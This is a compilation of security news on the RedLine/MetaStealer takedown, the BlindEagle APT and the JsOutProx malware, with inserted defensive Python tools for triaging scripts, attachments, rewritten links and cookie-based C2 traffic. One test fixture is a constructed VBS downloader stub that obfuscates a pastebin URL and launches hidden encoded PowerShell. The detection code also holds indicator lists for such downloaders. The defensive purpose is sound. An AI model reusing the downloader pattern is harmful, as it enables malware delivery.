1200 Servers Of RedLine & META Infostealers Seized By Authorities
Dutch police, working with international partners, have shut down two well-known information-stealing malware operations, RedLine and MetaStealer, in a significant step against cybercrime.
The operation, codenamed “Operation Magnus,” took place on October 28, 2024, and involved authorities from the United States, the United Kingdom, Belgium, Portugal, and Australia.
The takedown resulted in the shutdown of three servers in the Netherlands and the confiscation of two domains. Authorities estimate that over 1,200 servers across dozens of countries were involved in running the malware.
The operation led to the arrest of two individuals in Belgium, one of whom remains in custody. U.S. authorities have filed charges against an administrator.
RedLine and MetaStealer are information-stealing malware that target sensitive data such as passwords, login credentials, and personally identifiable information.
These tools have been crucial in the cybercrime ecosystem, allowing threat actors to harvest valuable data for further attacks or sale on criminal marketplaces.
The Dutch National Police gained full access to the criminals’ back-end infrastructure, including source code, license servers, API servers, panels, and Telegram bots.
This access has provided law enforcement with valuable information about the malware’s users, including usernames, passwords, IP addresses, and registration dates.
Security researchers estimate that RedLine alone was responsible for stealing over 170 million passwords in just the last six months. The malware has been active since at least 2020 and was often distributed through phishing emails or malicious downloads.
As investigations continue, authorities are expected to take further legal actions against individuals involved in using and distributing these malware strains.
This operation serves as a stark warning to cybercriminals that law enforcement agencies are becoming increasingly effective at disrupting their activities, even in spaces where they previously felt untouchable.
New APT Group BlindEagle Attacking Multiple Organizations Via Weaponized Emails
BlindEagle (APT-C-36) is a Latin American Advanced Persistent Threat group that has been active since 2018. It targets the governmental, financial, and energy sectors in Colombia, Ecuador, Chile, Panama, and other regional countries.
BlindEagle is known for employing straightforward yet impactful techniques; the group demonstrates versatility in switching between financially motivated attacks and espionage operations.
Cybersecurity researchers at Kaspersky Lab recently identified this new group, which was found to be attacking multiple organizations via weaponized emails.
APT Group BlindEagle Attacking Organizations
BlindEagle, an advanced threat actor, carries out multi-stage attacks, which start with phishing emails disguised as government and financial institutions.
Phishing impersonating the Attorney General’s Office (Source – Securelist)
To avoid detection, their campaigns apply geolocation-based filtering through URL shorteners so that they can only reach specific regions.
Typically, the initial infection vector is compressed files in different formats, including some less popular ones like LHA or UUE, which contain Visual Basic Scripts.
These scripts use WScript, XMLHTTP objects, or PowerShell to download further payloads from attacker-controlled servers or public platforms such as Pastebin or GitHub.
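The downloader behaviour described above (CreateObject calls for XMLHTTP or WScript.Shell, a PowerShell hand-off, and payload URLs on public platforms) can be triaged statically before a script is ever run. The following is an added example written for this page, not code from Kaspersky or from the report: it folds the common Chr(n)-and-concatenation string obfuscation back into literals, then scores the script on the indicators named above. The weights, the score threshold, and both sample scripts are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Illustrative weights (assumption, not from the report) for COM objects a VBS
# downloader typically instantiates. Versioned ProgIDs such as
# "MSXML2.XMLHTTP.6.0" are matched by prefix.
OBJECT_WEIGHTS = {
    "msxml2.xmlhttp": 2,
    "msxml2.serverxmlhttp": 2,
    "winhttp.winhttprequest": 2,
    "adodb.stream": 2,
    "wscript.shell": 1,
    "scripting.filesystemobject": 0,
}
# Public platforms the report names as payload hosts.
PUBLIC_HOSTS = {"pastebin.com", "github.com", "raw.githubusercontent.com", "gist.github.com"}

CREATE_OBJECT = re.compile(r'CreateObject\s*\(\s*"([^"]+)"', re.I)
CHR_RUN = re.compile(r"Chr\s*\(\s*\d+\s*\)(?:\s*&\s*Chr\s*\(\s*\d+\s*\))*", re.I)
CHR_NUM = re.compile(r"Chr\s*\(\s*(\d+)\s*\)", re.I)
STRING_JOIN = re.compile(r'"\s*&\s*"')
POWERSHELL = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
URL = re.compile(r"https?://[^\s\"'<>]+", re.I)


def normalise_strings(script: str):
    """Fold Chr(n) runs into string literals and join "a" & "b" concatenations,
    so that a URL assembled from pieces becomes one visible literal.
    Returns (normalised_text, chr_obfuscation_seen)."""
    chr_seen = CHR_RUN.search(script) is not None

    def fold(match):
        codes = CHR_NUM.findall(match.group(0))
        return '"' + "".join(chr(int(c)) for c in codes) + '"'

    text = CHR_RUN.sub(fold, script)
    while True:  # "a" & "b" & "c" -> "abc", repeated until nothing changes
        joined = STRING_JOIN.sub("", text)
        if joined == text:
            return text, chr_seen
        text = joined


def classify_object(progid: str):
    p = progid.lower()
    for key, weight in OBJECT_WEIGHTS.items():
        if p == key or p.startswith(key + "."):
            return key, weight
    return p, 0


def scan_vbs(script: str) -> dict:
    """Score a VBS script for downloader behaviour; 4 or more is flagged (assumed threshold)."""
    text, chr_seen = normalise_strings(script)
    score = 1 if chr_seen else 0
    objects = []
    for progid in CREATE_OBJECT.findall(text):
        key, weight = classify_object(progid)
        if key not in objects:
            objects.append(key)
            score += weight
    urls = URL.findall(text)
    public_hosts = sorted({(urlparse(u).hostname or "").lower() for u in urls} & PUBLIC_HOSTS)
    if urls:
        score += 1
    score += 2 * len(public_hosts)
    powershell = POWERSHELL.search(text) is not None
    if powershell:
        score += 2
    return {
        "objects": objects,
        "urls": urls,
        "public_hosts": public_hosts,
        "powershell": powershell,
        "chr_obfuscation": chr_seen,
        "score": score,
        "verdict": "suspicious" if score >= 4 else "benign",
    }


# Constructed samples (not real BlindEagle artifacts): a downloader stub whose
# URL is split with Chr(46), and a harmless administrative script.
SAMPLE_VBS = r'''
Set http = CreateObject("MSXML2.XMLHTTP")
url = "https://pastebin" & Chr(46) & "com/raw/EXAMPLEID"
http.Open "GET", url, False
http.Send
Set sh = CreateObject("WScript.Shell")
sh.Run "powershell -w hidden -enc QUJD", 0, False
'''
BENIGN_VBS = r'''
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Echo fso.GetFolder(".").Path
'''

if __name__ == "__main__":
    for label, sample in (("sample", SAMPLE_VBS), ("benign", BENIGN_VBS)):
        print(label, scan_vbs(sample))
```

The normalisation step matters more than the indicator list: a script that builds "pastebin.com" from Chr() calls defeats a plain string search, but not this scan. Scores above the threshold are a reason to detonate the file in a sandbox, not a conviction on their own.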
The group’s malware deployment advances through several stages built from encoded or obfuscated artifacts, often using steganography, and ends with modified open-source Remote Access Trojans (RATs).
Steganography used in a BlindEagle campaign (Source – Securelist)
The group uses several different RATs, including njRAT, LimeRAT, BitRAT, and AsyncRAT, and switches between them frequently according to each campaign’s goal, whether stealing money online or cyber espionage.
They use process injection techniques, mainly process hollowing, so that the final payload executes inside the memory space of a legitimate process and evades detection.
The team modifies its RATs with improved information-collection abilities, additional plugin installation features, and, in some cases, a special capability for intercepting bank account credentials, showing how they tailor the tools to their victims or to what each campaign intends to achieve, reads the report.
BlindEagle was previously recognized as using simple tactics such as basic phishing and off-the-shelf malware. But more recently, the group has demonstrated more complex methods against its targets.
In May 2023, they conducted a campaign that included artifacts with Portuguese language characteristics and employed Brazilian image-hosting sites, possibly showing cooperation with other groups.
In June of that year, an attack used the DLL sideloading technique and deployed HijackLoader, a new modular malware loader.
TTPs
The TTPs observed in these campaigns are:
Phishing
Malicious Attachments
URL Shorteners
Dynamic DNS
Public Infrastructure
Process Hollowing
VBS Scripts/.NET Assemblies
Open-source RATs
Phishing emails purporting to be from Colombian judicial institutions start these attacks with malicious PDF or DOCX attachments containing files that appear legitimate but trick victims into downloading and running them.
While Colombia remains an important destination for them, with 87% of victims located there, BlindEagle also operates in Ecuador, Chile, and Panama.
Various sectors, including government, education, health, and transport, are affected by their campaigns. BlindEagle continues to represent a serious threat in the region through its repeated cyber-espionage and financial credential theft campaigns.
Automate Analysis of Common Attack Vectors with a Malware Sandbox
Analysts often face an overwhelming number of threats daily, each demanding a detailed examination to understand its behavior and potential impact.
When alerts start piling up, manually analyzing each one becomes time-consuming and puts your team under pressure.
Fortunately, these threats can be handled faster and more efficiently with automated malware analysis. By automating various tasks, you can uncover threats quicker, minimize errors, and free up your team to focus on more critical work.
CAPTCHAs are often used by attackers to add an additional layer of complexity to malicious activity, requiring user interaction to proceed.
These challenges can hinder manual analysis by slowing down the investigation process.
In automated analysis sessions, CAPTCHAs are solved automatically without requiring any manual input. The analysis process continues smoothly, and all stages of the attack are executed.
For example, in this analysis session, CAPTCHAs encountered during a phishing attack are bypassed automatically, allowing the sandbox to detect and observe the subsequent steps in the attack chain.
This approach simplifies the analysis and provides a complete view of the threat, saving analysts time and effort.
QR Codes: A New Gateway for Malware
QR codes have become popular in modern interactions, from payments to marketing. However, they are also a delivery mechanism for malware.
A malicious QR code can direct users to phishing sites or trick them into downloading malware onto their devices.
Cybercriminals often embed QR codes in documents. Tools like ANY.RUN’s sandbox bypass these obstacles during automated analysis sessions and uncover the hidden threats.
As seen in this analysis session, the detection of malware doesn’t stop or require manual effort when encountering a QR code. The sandbox automatically detects and opens the embedded link, keeping the analysis session uninterrupted.
During the threat analysis, the sandbox also determines if the content is malicious and displays the verdict in the upper-right corner of the interface, saving both time and effort for analysts.
Email Attachments: The Classic Attack Vector
Email attachments continue to be a popular method for distributing malware. Threat actors often hide malicious payloads in files such as ZIP archives, requiring specific actions or multiple steps to execute the attack.
Automated analysis speeds up this process by extracting, opening, and observing the behavior of potential threats in a secure, isolated environment.
In the following sample, we see how easy it is to automate the analysis of email attachments with the help of an interactive sandbox.
With automated analysis, the sandbox extracts the ZIP file attached to the email. Then, it finds the Formbook executable inside the archive and runs it automatically to observe its behavior.
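Before an archive attachment is handed to a sandbox, a mail gateway can already make a static decision on it: does it contain executables, a "document" name with an executable extension, a nested archive, or an entry that would escape the extraction directory? The following is an added example written for this page, not ANY.RUN's code: it inspects a ZIP in memory, reads only the first two bytes of each entry to spot PE files regardless of their name, and produces a verdict. The extension lists, the ratio and size limits, and the sample archive are constructed assumptions.

```python
import io
import zipfile

# Extension sets are illustrative (assumption), not a vendor list.
EXEC_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".vbe",
            ".js", ".jse", ".wsf", ".hta", ".dll", ".lnk", ".ps1", ".msi"}
ARCHIVE_EXT = {".zip", ".rar", ".7z", ".iso", ".img", ".lha", ".lzh", ".uue", ".gz", ".cab"}
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
MAX_RATIO = 100               # uncompressed/compressed ratio that suggests a zip bomb
MAX_TOTAL = 200 * 1024 ** 2   # cap on total uncompressed bytes per archive
BLOCK_FLAGS = {"executable-extension", "double-extension", "pe-magic", "path-traversal"}


def _extensions(name: str) -> list:
    """'Invoice.pdf.exe' -> ['.pdf', '.exe']; directories are stripped first."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    return ["." + p for p in parts[1:]]


def triage_zip(data: bytes) -> dict:
    """Inspect a ZIP attachment without executing anything; report per-entry flags."""
    entries, total = [], 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            flags = []
            name = info.filename
            exts = _extensions(name)
            last = exts[-1] if exts else ""
            if name.startswith(("/", "\\")) or ".." in name.replace("\\", "/").split("/"):
                flags.append("path-traversal")
            if last in EXEC_EXT:
                flags.append("executable-extension")
            if len(exts) >= 2 and exts[-2] in DOC_EXT and last in EXEC_EXT:
                flags.append("double-extension")
            if last in ARCHIVE_EXT:
                flags.append("nested-archive")
            if info.flag_bits & 0x1:
                flags.append("encrypted")   # content cannot be inspected without a password
            else:
                with zf.open(info) as fh:   # two bytes suffice: PE files start with "MZ"
                    magic = fh.read(2)
                if magic == b"MZ":
                    flags.append("pe-magic")
                    if last not in EXEC_EXT:
                        flags.append("extension-mismatch")
            if info.compress_size and info.file_size / info.compress_size > MAX_RATIO:
                flags.append("high-compression-ratio")
            total += info.file_size
            entries.append({"name": name, "size": info.file_size, "flags": flags})
    archive_flags = ["archive-too-large"] if total > MAX_TOTAL else []
    all_flags = set(archive_flags).union(*(e["flags"] for e in entries))
    if all_flags & BLOCK_FLAGS:
        verdict = "block"
    elif all_flags:
        verdict = "review"
    else:
        verdict = "allow"
    return {"verdict": verdict, "archive_flags": archive_flags,
            "entries": entries, "total_uncompressed": total}


def build_sample() -> bytes:
    """Constructed test archive: a fake 'invoice' PE, a text file, and a nested ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Invoice_2024.pdf.exe", b"MZ" + b"\x00" * 64)   # PE stub, not a real program
        zf.writestr("readme.txt", b"Please see attached invoice.")
        inner = io.BytesIO()
        with zipfile.ZipFile(inner, "w") as izf:
            izf.writestr("payload.vbs", b"WScript.Echo 1")
        zf.writestr("more.zip", inner.getvalue())
    return buf.getvalue()


if __name__ == "__main__":
    report = triage_zip(build_sample())
    print(report["verdict"])
    for entry in report["entries"]:
        print(entry["name"], entry["flags"])
```

Nested archives and encrypted entries come back as "review" rather than "block" because the static pass cannot see inside them; those are exactly the cases to route to automated sandbox detonation as the article describes.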
Blocked Links: Extracting Hidden URLs
Blocked or rewritten links are commonly used by cybercriminals to bypass security filters. These links appear harmless but redirect to malicious destinations once clicked, making them a dangerous tool for phishing and malware delivery.
Automated analysis in a sandbox environment is ideal for handling such scenarios.
Tools like ANY.RUN can simulate user behavior, extract these hidden URLs, and follow them in a controlled environment. This process ensures that the final destination and any associated threats are exposed without putting real systems at risk.
For example, in a sandbox session analyzing a blocked phishing URL, the link appeared rewritten to Microsoft’s domain safelinks[.]protection[.]outlook[.]com with a warning indicating the link was malicious.
However, this block prevented further insight into the threat.
By enabling Automated Interactivity and rerunning the analysis, the sandbox bypassed the rewritten URL, allowing all stages of the attack to execute, including those requiring CAPTCHA-solving.
This revealed that the attack was conducted by the Storm-1575 threat actor using the DadSec phishing platform, as indicated by the associated tags.
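When a rewritten link blocks further analysis, the first thing an analyst needs is the original destination. Microsoft Safe Links carries it in the url= query parameter of the wrapper, so it can be recovered without following the link at all. The following is an added example written for this page, not ANY.RUN's code: it refangs analyst notation such as the safelinks[.]protection[.]outlook[.]com form used above, peels nested wrappers, and resolves every link in an email body. The sample wrapper and email are constructed, and the target domain uses the reserved .invalid TLD.

```python
import re
from urllib.parse import parse_qs, quote, urlparse

SAFELINKS_SUFFIX = ".safelinks.protection.outlook.com"
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)


def refang(s: str) -> str:
    """Undo analyst defanging such as hxxps:// and example[.]com."""
    return (s.replace("[.]", ".").replace("(.)", ".")
             .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def unwrap_safelink(url: str, max_depth: int = 5):
    """Peel Safe Links wrappers (the original target travels in the url= query
    parameter) until a non-Safe-Links URL remains. Returns (url, layers_removed)."""
    current = refang(url.strip().rstrip(".,;)"))
    for depth in range(max_depth):
        parsed = urlparse(current)
        host = (parsed.hostname or "").lower()
        if not host.endswith(SAFELINKS_SUFFIX):
            return current, depth
        target = parse_qs(parsed.query).get("url")
        if not target:
            return current, depth      # wrapper without a target: leave as-is
        current = target[0]            # parse_qs already percent-decodes
    return current, max_depth


def extract_links(text: str) -> list:
    """Find every link in an email body and resolve the wrapped ones."""
    results = []
    for match in URL_RE.findall(text):
        final, layers = unwrap_safelink(match)
        results.append({
            "wrapped": match,
            "final": final,
            "final_host": (urlparse(final).hostname or "").lower(),
            "layers": layers,
        })
    return results


# Constructed samples: one Safe Links wrapper, one wrapper around a wrapper,
# and a short phishing-style email body containing them.
TARGET = "https://example-login.invalid/verify?id=42"
SAMPLE_SAFELINK = ("https://nam12.safelinks.protection.outlook.com/?url="
                   + quote(TARGET, safe="") + "&data=05%7C01%7C&sdata=AbCd&reserved=0")
DOUBLE_WRAPPED = ("https://eur01.safelinks.protection.outlook.com/?url="
                  + quote(SAMPLE_SAFELINK, safe=""))
SAMPLE_EMAIL = f"""Your mailbox is full. Review it here: {SAMPLE_SAFELINK}
Regards, IT. Policy: https://example.com/policy.
"""

if __name__ == "__main__":
    for link in extract_links(SAMPLE_EMAIL):
        print(link["layers"], link["final_host"], link["final"])
```

The recovered URL is the input for the sandbox run described above; comparing final_host against the sender's domain and the text the link was displayed with is the quickest static signal that a rewritten link deserves detonation.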
With automated analysis, the sandbox takes care of every step, saving you time and delivering accurate insights without the need for manual input.
JsOutProx Malware Abusing GitLab To Attack Financial Institutions
GitLab is a prominent web-based Git repository manager. Attackers target it to gain unauthorized access to confidential source code, steal intellectual property, or insert malicious code into projects hosted on GitLab.
Vulnerabilities in GitLab’s software, or misconfigurations in how it is deployed, can serve as an initial foothold from which the whole system is breached and other networks or systems connected to it are targeted.
A new variation of JSOutProx emerged as a stealthy attack framework that combines JavaScript and .NET components.
It is aimed at financial institutions in the APAC and MENA regions and uses .NET serialization to load malicious JavaScript code on compromised systems.
This modular malware, attributed to SOLAR SPIDER and linked to phishing campaigns since 2019, can also load plugins for malicious actions after the initial intrusion.
JsOutProx Malware Abusing GitLab
A surge in activity was detected around February 8, 2024, when a Saudi Arabian system integrator reported an incident targeting the customers of a major regional bank.
The campaign impersonated “mike.will@my[.]com” and employed fake SWIFT/Moneygram payment notifications to deliver malicious payloads.
Besides this, Resecurity aided multiple victims through DFIR engagements, recovering the malware used in these impersonation attacks aimed at banking customers across enterprises and individuals.
As first reported in November 2023, Solar Spider hosted its payloads on GitHub repositories, with the JavaScript code disguised as PDF files.
The group then shifted from GitHub to GitLab repositories: on March 27, 2024, Resecurity discovered a new sample from this group that used GitLab repositories as part of a multi-stage infection chain.
Activity detected (Source – Resecurity)
On the 25th of March, 2024, several GitLab accounts that belonged to this actor were registered to host malicious payloads in repositories such as “docs909” (established on April 2) and “dox05” (established on March 26).
This rotating repository tactic probably assists in maintaining different payloads for various victims.
After delivering the malware successfully, the actor deletes the repository and opens another.
Notably, Resecurity secured the latest payloads uploaded on April 2, 2024, shedding light on a developing GitLab campaign.
JSOutProx is a RAT with a hidden, hard-to-read JavaScript backdoor whose modules provide command execution, file operations, persistence mechanisms, screen capture, and system control, all of which defenders need to detect, prevent, and mitigate.
One exceptional point is how it employs the Cookie header while communicating with C2s.
Resecurity retrieved the deobfuscated implants from archived payloads, and its analysts decoded the JavaScript for further analysis and defensive measures.
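A Cookie header is a convenient place to hide C2 traffic because proxies and web filters rarely inspect it. The page does not give the exact format JSOutProx uses, so the following added example (written for this page, not Resecurity's code) stays generic: it walks a chronological proxy log, remembers which cookie names each host actually issued in Set-Cookie responses, and flags requests that send cookies the host never set, cookies with high-entropy values, or cookies to bare IP addresses. The thresholds, the log records, and the beacon value are constructed assumptions.

```python
import ipaddress
import math
import random
import string
from collections import defaultdict

ENTROPY_THRESHOLD = 4.0   # bits per character; assumption, tune on your own traffic
MAX_COOKIE_VALUE = 256    # bytes; assumption


def shannon_entropy(s: str) -> float:
    """Bits per character; 64 distinct characters out of 64 gives exactly 6.0."""
    if not s:
        return 0.0
    n = len(s)
    counts = {c: s.count(c) for c in set(s)}
    return -sum(k / n * math.log2(k / n) for k in counts.values())


def parse_cookie_header(value: str) -> list:
    """Split 'a=1; b=2; token' into [(name, value), ...]; bare tokens get an empty name."""
    pairs = []
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, sep, val = part.partition("=")
        pairs.append((name.strip(), val.strip()) if sep else ("", part))
    return pairs


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def analyse_log(records: list) -> list:
    """Flag requests whose Cookie header looks like a data channel rather than
    session state. Records are dicts with dir ('req'/'resp'), host, and either
    'cookie' (requests) or 'set_cookie' (a list, responses)."""
    known = defaultdict(set)   # host -> cookie names that host actually issued
    findings = []
    for index, rec in enumerate(records):
        host = rec["host"].lower()
        if rec["dir"] == "resp":
            for sc in rec.get("set_cookie", []):
                name = sc.split(";", 1)[0].partition("=")[0].strip()
                if name:
                    known[host].add(name)
            continue
        cookie = rec.get("cookie")
        if not cookie:
            continue
        flags = []
        if is_ip_literal(host):
            flags.append("ip-literal-host")
        for name, val in parse_cookie_header(cookie):
            label = name or "<bare>"
            if name not in known[host]:
                flags.append(f"unset-cookie:{label}")
            if len(val) > MAX_COOKIE_VALUE:
                flags.append(f"oversized:{label}")
            if len(val) >= 32 and shannon_entropy(val) > ENTROPY_THRESHOLD:
                flags.append(f"high-entropy:{label}")
        if flags:
            findings.append({"index": index, "host": host, "flags": flags})
    return findings


# Constructed beacon value: the 64 base64 characters in a fixed shuffled order,
# so its entropy is exactly 6 bits per character regardless of the order.
_alphabet = list(string.ascii_letters + string.digits + "+/")
random.Random(7).shuffle(_alphabet)
BEACON_VALUE = "".join(_alphabet)

# Constructed proxy log: a normal session cookie exchange, then a request to a
# TEST-NET address carrying a cookie no server ever set.
SAMPLE_LOG = [
    {"dir": "resp", "host": "www.example.com", "set_cookie": ["session=7f3a9c; Path=/; HttpOnly"]},
    {"dir": "req",  "host": "www.example.com", "cookie": "session=7f3a9c"},
    {"dir": "req",  "host": "203.0.113.5",     "cookie": "id=" + BEACON_VALUE},
]

if __name__ == "__main__":
    for finding in analyse_log(SAMPLE_LOG):
        print(finding)
```

The unset-cookie rule produces false positives for sites that set cookies from JavaScript (document.cookie) rather than Set-Cookie, so in practice it is weighted together with the host and entropy signals rather than alerting alone.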
The first stage implant has functionalities that allow it to update, set proxy/sleep times, execute processes, evaluate JavaScript, and exit.
It interacts with ActiveXObject, a Windows Script Host object used for malicious automation tasks. The second stage adds other plug-ins that broaden the malware’s range of functions.
Moreover, the continuously evolving malware exhibits an organized development effort, attacking high-profile victims in government and finance sectors with customized lures.